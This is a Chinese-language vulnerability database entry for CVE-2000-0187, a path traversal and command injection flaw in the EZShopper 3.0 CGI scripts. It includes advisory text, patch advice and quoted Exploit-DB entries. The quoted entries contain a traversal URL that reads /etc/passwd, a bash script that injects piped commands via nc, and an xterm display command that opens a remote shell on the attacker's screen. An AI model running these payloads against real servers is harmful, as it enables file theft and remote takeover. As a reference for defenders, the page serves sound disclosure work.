CVE-2000-0187
CVSS7.5
发布时间 :2000-02-27 00:00:00
修订时间 :2008-09-10 15:03:15
NMCOES    

[原文]EZShopper 3.0 loadpage.cgi CGI script allows remote attackers to read arbitrary files via a .. (dot dot) attack or execute commands via shell metacharacters.


[CNNVD]EZShopper远程命令执行漏洞(CNNVD-200002-076)

        EZShopper 3.0版本loadpage.cgi CGI脚本存在漏洞。远程攻击者借助..(点 点)攻击读取任意文件或借助shell元字符执行命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0187
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0187
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200002-076
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1014
(VENDOR_ADVISORY)  BID  1014
http://archives.neohapsis.com/archives/bugtraq/2000-02/0356.html
(UNKNOWN)  BUGTRAQ  20000227 EZ Shopper 3.0 shopping cart CGI remote command execution

- 漏洞信息

EZShopper远程命令执行漏洞
高危 输入验证
2000-02-27 00:00:00 2005-10-20 00:00:00
远程  
        EZShopper 3.0版本loadpage.cgi CGI脚本存在漏洞。远程攻击者借助..(点 点)攻击读取任意文件或借助shell元字符执行命令。

- 公告与补丁

        Download and install the newest version from AHG's website,
        http://www.ahg.com.

- 漏洞信息 (659)

EZshopper Directory Transversal in loadpage.cgi (EDBID:659)
cgi webapps
2004-11-25 Verified
0 Zero X
N/A [点击下载]
Example:

http://targethost/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html

# milw0rm.com [2004-11-25]
		

- 漏洞信息 (19781)

Alex Heiphetz Group EZShopper 3.0 Remote Command Execution (EDBID:19781)
multiple remote
2000-02-27 Verified
0 suid
N/A [点击下载]
source: http://www.securityfocus.com/bid/1014/info

EZShopper is a perl-based E-Commerce software package offered by Alex Heiphetz Group, Inc. It is possible to remotely compromise a host due to a lack of checks on user input passed directly to the open() call. This vulnerability exists in two scripts shipped with EZShopper, loadpage.cgi and search.cgi. 

In the first vulnerability, the variable passed to open() is called "file" and is submitted to a script called loadpage.cgi. There are no checks on "file", meaning that if "../" preceed an arbitrary filename/path as the file variable, those "../" paths will be followed and the arbitrary file anywhere on the filesystem will be displayed (provided that the uid of the webserver has access to them..). If pipes are included in the variable, arbitrary commands can be executed on the target host possibly giving remote access to the attacker with the uid of the webserver (usually 'nobody'). 

The second vulnerability is identical in nature to the first but is in the "search.cgi" script. In search.cgi, no checks are made on user input variables 'template' and 'database' (passed to open()). As a result, it is possible to view files or execute commands on the host through search.cgi as well.

#!/bin/bash 
echo -e "GET http: //www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=|"$1"| HTTP/1.0\n\n" | nc proxy.server.com 8080

[ /cut ]

$ ./ezhack.sh /usr/X11R6/bin/xterm%20-display%

(this would send an xterm from the target host to wherever display is)

http: //www.example.com/cgi-bin/search.cgi?user_id=1&database=<insert here>&template=<or insert here>&distinct=1		

- 漏洞信息

56
EZshopper loadpage.cgi Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified, Third-party Verified

- 漏洞描述

EZShopper contains a flaw that allows a remote attacker to execute commands on the server and view files outside the web path. The issue is due to the loadpage.cgi script not properly sanitizing user input supplied via the file variable.

- 时间线

2000-02-27 2000-02-26
2000-02-27 Unknow

- 解决方案

Upgrade to version 3.0 or higher, as it has been reported to fix this vulnerability. In addition, Alex Heiphetz Group has released a patch for some older versions.

- 相关参考

- 漏洞作者

- 漏洞信息

EZShopper Remote Command Execution Vulnerability
Input Validation Error 1014
Yes No
2000-02-27 12:00:00 2009-07-11 01:56:00
First posted to BugTraq by suid <suid@suid.kg> on February 27, 2000.

- 受影响的程序版本

Alex Heiphetz Group EZShopper 3.0
- Microsoft Windows NT 4.0
- RedHat Linux 7.0
- Sun Solaris 8_sparc

- 漏洞讨论

EZShopper is a perl-based E-Commerce software package offered by Alex Heiphetz Group, Inc. It is possible to remotely compromise a host due to a lack of checks on user input passed directly to the open() call. This vulnerability exists in two scripts shipped with EZShopper, loadpage.cgi and search.cgi.

In the first vulnerability, the variable passed to open() is called "file" and is submitted to a script called loadpage.cgi. There are no checks on "file", meaning that if "../" preceed an arbitrary filename/path as the file variable, those "../" paths will be followed and the arbitrary file anywhere on the filesystem will be displayed (provided that the uid of the webserver has access to them..). If pipes are included in the variable, arbitrary commands can be executed on the target host possibly giving remote access to the attacker with the uid of the webserver (usually 'nobody').

The second vulnerability is identical in nature to the first but is in the "search.cgi" script. In search.cgi, no checks are made on user input variables 'template' and 'database' (passed to open()). As a result, it is possible to view files or execute commands on the host through search.cgi as well.

- 漏洞利用

[ cut --- ezhack.sh ]

#!/bin/bash
echo -e "GET http: //www.example.com/cgi-bin/loadpage.cgi?user_id=1&amp;file=|"$1"| HTTP/1.0\n\n" | nc proxy.server.com 8080

[ /cut ]

$ ./ezhack.sh /usr/X11R6/bin/xterm%20-display%

(this would send an xterm from the target host to wherever display is)

http: //www.example.com/cgi-bin/search.cgi?user_id=1&amp;database=&lt;insert here&gt;&amp;template=&lt;or insert here&gt;&amp;distinct=1

- 解决方案

Download and install the newest version from AHG's website, http://www.ahg.com.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站